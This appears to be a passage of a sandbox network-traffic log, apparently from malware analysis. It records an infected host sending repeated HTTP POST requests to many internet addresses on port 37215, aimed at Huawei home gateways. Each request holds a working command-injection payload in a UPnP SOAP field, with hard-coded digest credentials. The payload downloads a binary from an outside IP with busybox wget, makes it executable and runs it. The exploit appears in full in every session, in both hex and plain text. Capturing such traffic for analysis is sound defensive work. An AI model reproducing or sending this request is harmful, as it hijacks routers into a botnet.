                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              607192.168.2.1542290138.249.48.8337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223267078 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              608192.168.2.1555472190.89.61.22037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223269939 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              609192.168.2.1559932156.63.15.10237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223269939 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              610192.168.2.1555726156.185.133.21137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223272085 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              611192.168.2.1543348181.224.178.16037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223273039 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              612192.168.2.1547016197.159.122.037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223294020 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              613192.168.2.1536960122.184.76.19637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223321915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              614192.168.2.1550982197.181.80.10037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223351955 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              615192.168.2.153734045.93.212.20537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223402023 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              616192.168.2.154969441.179.190.22037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223432064 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              617192.168.2.1552248122.64.109.21337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223443031 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
